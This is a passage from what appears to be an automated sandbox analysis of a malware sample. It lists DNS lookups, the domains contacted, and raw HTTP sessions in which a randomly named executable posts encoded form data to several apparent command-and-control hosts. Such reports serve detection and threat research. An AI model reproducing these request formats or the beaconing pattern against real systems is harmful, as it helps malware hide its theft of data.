                                                                                                                    Oct 24, 2024 05:09:11.483333111 CEST1.1.1.1192.168.2.40xb125No error (0)www.ly0.xyz104.21.78.104A (IP address)IN (0x0001)false
                                                                                                                    Oct 24, 2024 05:09:11.483333111 CEST1.1.1.1192.168.2.40xb125No error (0)www.ly0.xyz172.67.220.57A (IP address)IN (0x0001)false
                                                                                                                    Oct 24, 2024 05:09:25.235223055 CEST1.1.1.1192.168.2.40xb875No error (0)www.myrideguy.netmyrideguy.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Oct 24, 2024 05:09:25.235223055 CEST1.1.1.1192.168.2.40xb875No error (0)myrideguy.net68.66.226.116A (IP address)IN (0x0001)false
                                                                                                                    Oct 24, 2024 05:09:38.881763935 CEST1.1.1.1192.168.2.40xd05fNo error (0)www.lunch.delivery13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                    Oct 24, 2024 05:09:38.881763935 CEST1.1.1.1192.168.2.40xd05fNo error (0)www.lunch.delivery76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                    Oct 24, 2024 05:09:52.262706995 CEST1.1.1.1192.168.2.40x5d69No error (0)www.allinathletes.bizallinathletes.bizCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Oct 24, 2024 05:09:52.262706995 CEST1.1.1.1192.168.2.40x5d69No error (0)allinathletes.biz3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                    Oct 24, 2024 05:09:52.262706995 CEST1.1.1.1192.168.2.40x5d69No error (0)allinathletes.biz15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                    Oct 24, 2024 05:10:05.809987068 CEST1.1.1.1192.168.2.40x798bNo error (0)www.barbequecritics.combarbequecritics.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Oct 24, 2024 05:10:05.809987068 CEST1.1.1.1192.168.2.40x798bNo error (0)barbequecritics.com3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                    Oct 24, 2024 05:10:05.809987068 CEST1.1.1.1192.168.2.40x798bNo error (0)barbequecritics.com15.197.148.33A (IP address)IN (0x0001)false

                                                                                                                    HTTP Request Dependency Graph

                                                                                                                    • www.academyinmotion.xyz
                                                                                                                    • www.heeraka.info
                                                                                                                    • www.awesomearv.buzz
                                                                                                                    • www.030002252.xyz
                                                                                                                    • www.60881.xyz
                                                                                                                    • www.mjcregionsud.org
                                                                                                                    • www.levelsabovetravel.info
                                                                                                                    • www.d81dp.top
                                                                                                                    • www.numbox.live
                                                                                                                    • www.ly0.xyz
                                                                                                                    • www.myrideguy.net
                                                                                                                    • www.lunch.delivery
                                                                                                                    • www.allinathletes.biz
                                                                                                                    • www.barbequecritics.com

                                                                                                                    HTTP Packets

                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    0192.168.2.4497733.33.130.190805568C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 24, 2024 05:07:05.202687025 CEST538OUTGET /63ck/?Znyl=2rnxDB&Qzj=GQYraOg50FzHvWxTy9J2g/Ct8yJZYLUl1pszYO6BquwY8zCRfPuOPPLv6opwWQ+1qa0YVJN1ZlZd4AL6pjVc8tqy3KaAjtZyQfx4UTLqHu607EYV+xyRwE8= HTTP/1.1
                                                                                                                    Host: www.academyinmotion.xyz
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Oct 24, 2024 05:07:05.833090067 CEST391INHTTP/1.1 200 OK
                                                                                                                    Server: openresty
                                                                                                                    Date: Thu, 24 Oct 2024 03:07:05 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 251
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 5a 6e 79 6c 3d 32 72 6e 78 44 42 26 51 7a 6a 3d 47 51 59 72 61 4f 67 35 30 46 7a 48 76 57 78 54 79 39 4a 32 67 2f 43 74 38 79 4a 5a 59 4c 55 6c 31 70 73 7a 59 4f 36 42 71 75 77 59 38 7a 43 52 66 50 75 4f 50 50 4c 76 36 6f 70 77 57 51 2b 31 71 61 30 59 56 4a 4e 31 5a 6c 5a 64 34 41 4c 36 70 6a 56 63 38 74 71 79 33 4b 61 41 6a 74 5a 79 51 66 78 34 55 54 4c 71 48 75 36 30 37 45 59 56 2b 78 79 52 77 45 38 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Znyl=2rnxDB&Qzj=GQYraOg50FzHvWxTy9J2g/Ct8yJZYLUl1pszYO6BquwY8zCRfPuOPPLv6opwWQ+1qa0YVJN1ZlZd4AL6pjVc8tqy3KaAjtZyQfx4UTLqHu607EYV+xyRwE8="}</script></head></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    1192.168.2.44986375.2.103.23805568C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 24, 2024 05:07:21.235543966 CEST795OUTPOST /o7wc/ HTTP/1.1
                                                                                                                    Host: www.heeraka.info
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.heeraka.info
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 200
                                                                                                                    Referer: http://www.heeraka.info/o7wc/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 71 71 72 4c 76 30 35 53 38 74 70 52 73 6d 58 31 5a 6b 62 52 30 6a 45 79 5a 43 72 38 34 31 31 6f 71 70 36 32 57 43 51 73 2f 45 7a 74 69 71 2f 34 66 30 53 64 75 69 64 33 39 70 59 46 35 31 66 56 31 71 6b 56 6f 6e 71 75 57 49 35 72 6d 45 63 48 42 2f 4c 6f 63 49 7a 6a 68 32 31 4b 6c 74 75 78 54 45 37 50 44 6b 55 67 55 78 52 75 78 31 78 6b 4e 53 50 53 33 44 43 49 69 72 7a 52 4e 32 4d 33 73 73 54 47 6e 5a 6f 79 6c 4a 66 37 58 64 65 4f 79 35 2f 50 68 6a 43 35 31 66 2f 43 56 59 36 72 2f 65 6c 51 44 36 52 64 44 65 38 58 52 34 45 34 79 48 56 39 37 69 61 4f 50 78 4c 6c 79 51 6a 32 55 77 3d 3d
                                                                                                                    Data Ascii: Qzj=qqrLv05S8tpRsmX1ZkbR0jEyZCr8411oqp62WCQs/Eztiq/4f0Sduid39pYF51fV1qkVonquWI5rmEcHB/LocIzjh21KltuxTE7PDkUgUxRux1xkNSPS3DCIirzRN2M3ssTGnZoylJf7XdeOy5/PhjC51f/CVY6r/elQD6RdDe8XR4E4yHV97iaOPxLlyQj2Uw==


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    2192.168.2.44987775.2.103.23805568C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 24, 2024 05:07:23.874382973 CEST815OUTPOST /o7wc/ HTTP/1.1
                                                                                                                    Host: www.heeraka.info
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.heeraka.info
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 220
                                                                                                                    Referer: http://www.heeraka.info/o7wc/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 71 71 72 4c 76 30 35 53 38 74 70 52 74 48 6e 31 4b 53 54 52 38 6a 45 39 63 43 72 38 79 56 31 73 71 70 2b 32 57 41 38 38 71 6e 58 74 68 50 44 34 59 77 4f 64 2b 79 64 33 70 35 59 4b 30 56 65 5a 31 71 6f 64 6f 6c 4f 75 57 49 74 72 6d 42 67 48 42 4f 4c 72 4f 6f 7a 68 6e 32 31 45 68 74 75 78 54 45 37 50 44 6e 6f 61 55 31 39 75 79 45 42 6b 4d 7a 50 52 36 6a 43 4c 30 62 7a 52 4a 32 4d 7a 73 73 53 54 6e 59 31 5a 6c 4e 76 37 58 63 75 4f 7a 6f 2f 4d 30 54 43 2f 34 2f 2b 6a 64 35 4c 30 78 75 56 61 64 59 56 75 4f 61 6b 6d 5a 65 56 69 6a 32 30 71 70 69 2b 39 53 32 43 52 2f 54 65 2f 50 7a 62 42 4b 39 34 6a 51 36 61 4e 74 56 37 7a 6f 78 53 69 42 59 77 3d
                                                                                                                    Data Ascii: Qzj=qqrLv05S8tpRtHn1KSTR8jE9cCr8yV1sqp+2WA88qnXthPD4YwOd+yd3p5YK0VeZ1qodolOuWItrmBgHBOLrOozhn21EhtuxTE7PDnoaU19uyEBkMzPR6jCL0bzRJ2MzssSTnY1ZlNv7XcuOzo/M0TC/4/+jd5L0xuVadYVuOakmZeVij20qpi+9S2CR/Te/PzbBK94jQ6aNtV7zoxSiBYw=


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    3192.168.2.44989375.2.103.23805568C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 24, 2024 05:07:26.433362961 CEST10897OUTPOST /o7wc/ HTTP/1.1
                                                                                                                    Host: www.heeraka.info
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.heeraka.info
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10300
                                                                                                                    Referer: http://www.heeraka.info/o7wc/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 71 71 72 4c 76 30 35 53 38 74 70 52 74 48 6e 31 4b 53 54 52 38 6a 45 39 63 43 72 38 79 56 31 73 71 70 2b 32 57 41 38 38 71 6e 66 74 68 35 58 34 59 52 4f 64 39 79 64 33 71 35 59 4a 30 56 65 55 31 71 67 5a 6f 6c 79 59 57 4b 56 72 6d 6a 59 48 44 38 6a 72 46 6f 7a 68 6c 32 31 4a 6c 74 75 6b 54 41 66 44 44 6b 41 61 55 31 39 75 79 47 5a 6b 46 43 50 52 38 6a 43 49 69 72 7a 4e 4e 32 4e 55 73 73 62 6f 6e 59 78 76 6c 65 6e 37 55 2f 57 4f 78 61 58 4d 6f 44 43 39 35 2f 2b 42 64 35 48 52 78 75 34 6c 64 5a 77 6d 4f 64 45 6d 5a 59 49 68 33 31 51 68 79 51 37 37 50 32 32 6f 79 51 75 70 4c 55 58 41 42 73 34 6f 47 37 76 69 70 55 76 34 38 78 53 59 58 50 78 56 50 4e 6f 38 56 6d 75 75 43 45 6f 6f 63 78 5a 54 2f 6d 61 47 32 4b 47 37 73 61 70 2b 2f 50 67 65 39 4b 49 6a 31 68 65 70 71 73 72 77 39 73 75 61 53 37 4c 31 50 6c 6b 42 64 77 70 48 4f 44 43 54 33 47 76 6d 47 52 6d 63 30 63 39 73 4b 73 52 51 6f 51 37 32 59 71 4c 49 54 33 46 38 31 6c 56 50 68 6e 64 68 2b 35 33 59 75 4b 4b 4d 45 4a 36 66 76 78 45 45 7a 66 [TRUNCATED]
                                                                                                                    Data Ascii: Qzj=qqrLv05S8tpRtHn1KSTR8jE9cCr8yV1sqp+2WA88qnfth5X4YROd9yd3q5YJ0VeU1qgZolyYWKVrmjYHD8jrFozhl21JltukTAfDDkAaU19uyGZkFCPR8jCIirzNN2NUssbonYxvlen7U/WOxaXMoDC95/+Bd5HRxu4ldZwmOdEmZYIh31QhyQ77P22oyQupLUXABs4oG7vipUv48xSYXPxVPNo8VmuuCEoocxZT/maG2KG7sap+/Pge9KIj1hepqsrw9suaS7L1PlkBdwpHODCT3GvmGRmc0c9sKsRQoQ72YqLIT3F81lVPhndh+53YuKKMEJ6fvxEEzfu+NTWwN6DiZWTSLU3PhCwk9+XeTzxcX1+KKKSIzYZHcs25sIwZxBijF8EPqBrROqahnI48LsJDgDXqG8f7kwQEje6R2aQmUk5/JmaO3UDjWao2dimk0hfGtqHqUCk4Sg4fEQKBNuColWP4PaQ3qnvB5fWX3pnN4upCxAPRfR/9K7gP8NnfmrjlZ13kBzI0oSBd6dvAO00+RWrcnE+MdghFo1xxGpoOC6JowRhvJipTwlfkQh3dNAh/I0l9GZHMuTThEd9soinRLjVcziWyc+3d7zBxiLm+vx4g1crZ28RMnrBN+qVKJgkFEFfOhhRVT/HURudgT5pmUMWkJCAbF6yauDyyRVVq1ZM/ncLDnU1m6F8n2k50OYyWpk5FCpaQ6Ptx///RWdAqbSOMFJMvtR+0SyfqdUqYMYmtkaDnrnxAv+4TFs25MmVJ511EE1AonAiNbLOlTUruUHnAxHsN7XwOlQaGgE0QP5AwQzFCCS7uh3fJ/2oC/1BMxzH0Gdgo4LTyr0ysC+598t8y/GI2H5/aKYttmOZ6bPw4E2vMvbZp4QfWDKws308PfDAv8DPos/9v3OFz+mgG4TRidG/enTq8Dqgh0oOaoUv08GcvJ2vLkFXUrmz/+cfuL8wzYEH8uREQlLnlXf2FfBy6j57ZdCQ/hjRfkXzXICiP [TRUNCATED]


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    4192.168.2.44990575.2.103.23805568C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 24, 2024 05:07:29.053287983 CEST531OUTGET /o7wc/?Qzj=noDrsAMitbMGukbGKwTOr3sYcBr23H5ivpvnAiMvw1nUlPzFIxH7oxZbrZBuy0eo4pgag2ycYt5GuEsaJdfqIMS3tV1Dx9iQIhSiX0wNT38Z12lUBSmDrQk=&Znyl=2rnxDB HTTP/1.1
                                                                                                                    Host: www.heeraka.info
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Oct 24, 2024 05:07:29.688046932 CEST391INHTTP/1.1 200 OK
                                                                                                                    Server: openresty
                                                                                                                    Date: Thu, 24 Oct 2024 03:07:29 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 251
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 51 7a 6a 3d 6e 6f 44 72 73 41 4d 69 74 62 4d 47 75 6b 62 47 4b 77 54 4f 72 33 73 59 63 42 72 32 33 48 35 69 76 70 76 6e 41 69 4d 76 77 31 6e 55 6c 50 7a 46 49 78 48 37 6f 78 5a 62 72 5a 42 75 79 30 65 6f 34 70 67 61 67 32 79 63 59 74 35 47 75 45 73 61 4a 64 66 71 49 4d 53 33 74 56 31 44 78 39 69 51 49 68 53 69 58 30 77 4e 54 33 38 5a 31 32 6c 55 42 53 6d 44 72 51 6b 3d 26 5a 6e 79 6c 3d 32 72 6e 78 44 42 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Qzj=noDrsAMitbMGukbGKwTOr3sYcBr23H5ivpvnAiMvw1nUlPzFIxH7oxZbrZBuy0eo4pgag2ycYt5GuEsaJdfqIMS3tV1Dx9iQIhSiX0wNT38Z12lUBSmDrQk=&Znyl=2rnxDB"}</script></head></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    5192.168.2.449938161.97.168.245805568C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 24, 2024 05:07:34.772094965 CEST804OUTPOST /53bw/ HTTP/1.1
                                                                                                                    Host: www.awesomearv.buzz
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.awesomearv.buzz
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 200
                                                                                                                    Referer: http://www.awesomearv.buzz/53bw/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 2f 34 63 57 41 71 57 4d 6f 2f 35 59 4f 68 44 70 50 6b 69 73 63 41 34 75 70 4b 31 63 74 5a 74 48 6c 36 4a 2f 44 75 39 47 63 69 32 4a 42 33 70 79 46 69 54 66 41 59 57 30 51 62 66 4d 33 4c 35 4b 30 31 64 34 50 6f 35 62 36 62 6d 65 72 68 61 4d 6d 2b 37 57 51 6f 41 78 38 30 45 30 56 50 74 54 6e 58 32 44 4f 46 6a 57 35 30 6a 6a 6c 6d 6a 41 50 46 5a 71 31 39 34 42 62 4d 68 37 57 6d 31 67 4d 30 7a 34 5a 59 6c 76 32 56 78 67 32 78 73 76 41 31 39 79 62 65 37 73 5a 69 4b 62 53 69 44 37 70 66 67 52 7a 78 66 41 65 35 45 62 50 57 6d 73 2b 78 75 6d 5a 6e 34 65 4b 74 65 58 55 30 4c 4e 69 51 3d 3d
                                                                                                                    Data Ascii: Qzj=/4cWAqWMo/5YOhDpPkiscA4upK1ctZtHl6J/Du9Gci2JB3pyFiTfAYW0QbfM3L5K01d4Po5b6bmerhaMm+7WQoAx80E0VPtTnX2DOFjW50jjlmjAPFZq194BbMh7Wm1gM0z4ZYlv2Vxg2xsvA19ybe7sZiKbSiD7pfgRzxfAe5EbPWms+xumZn4eKteXU0LNiQ==
                                                                                                                    Oct 24, 2024 05:07:35.644646883 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Thu, 24 Oct 2024 03:07:35 GMT
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    ETag: W/"66cd104a-b96"
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                                                    Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                                                                    Oct 24, 2024 05:07:35.644709110 CEST370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                                                    Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    6192.168.2.449953161.97.168.245805568C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 24, 2024 05:07:37.308964968 CEST824OUTPOST /53bw/ HTTP/1.1
                                                                                                                    Host: www.awesomearv.buzz
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.awesomearv.buzz
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 220
                                                                                                                    Referer: http://www.awesomearv.buzz/53bw/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 2f 34 63 57 41 71 57 4d 6f 2f 35 59 49 77 7a 70 49 47 4b 73 49 51 34 68 30 36 31 63 6e 35 74 4c 6c 36 46 2f 44 75 55 4e 63 77 53 4a 42 57 5a 79 43 67 72 66 48 59 57 30 46 72 66 4e 71 37 35 2f 30 31 59 46 50 71 74 62 36 66 47 65 72 6c 65 4d 6d 4a 50 56 51 34 41 7a 78 55 45 6c 62 76 74 54 6e 58 32 44 4f 46 65 37 35 30 72 6a 6b 58 7a 41 50 68 46 70 2f 64 34 43 50 63 68 37 53 6d 31 6b 4d 30 7a 57 5a 59 56 42 32 58 5a 67 32 78 63 76 52 45 39 7a 42 4f 37 75 64 69 4c 74 55 67 79 73 6e 4d 78 79 2b 68 4c 66 52 71 41 4e 4b 51 33 32 76 41 50 78 4c 6e 63 74 58 71 58 6a 5a 33 32 45 35 52 6e 2b 54 65 6a 55 31 6c 77 67 47 47 2f 2f 62 46 73 6c 45 63 38 3d
                                                                                                                    Data Ascii: Qzj=/4cWAqWMo/5YIwzpIGKsIQ4h061cn5tLl6F/DuUNcwSJBWZyCgrfHYW0FrfNq75/01YFPqtb6fGerleMmJPVQ4AzxUElbvtTnX2DOFe750rjkXzAPhFp/d4CPch7Sm1kM0zWZYVB2XZg2xcvRE9zBO7udiLtUgysnMxy+hLfRqANKQ32vAPxLnctXqXjZ32E5Rn+TejU1lwgGG//bFslEc8=
                                                                                                                    Oct 24, 2024 05:07:38.176356077 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Thu, 24 Oct 2024 03:07:38 GMT
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    ETag: W/"66cd104a-b96"
                                                                                                                    Content-Encoding: gzip
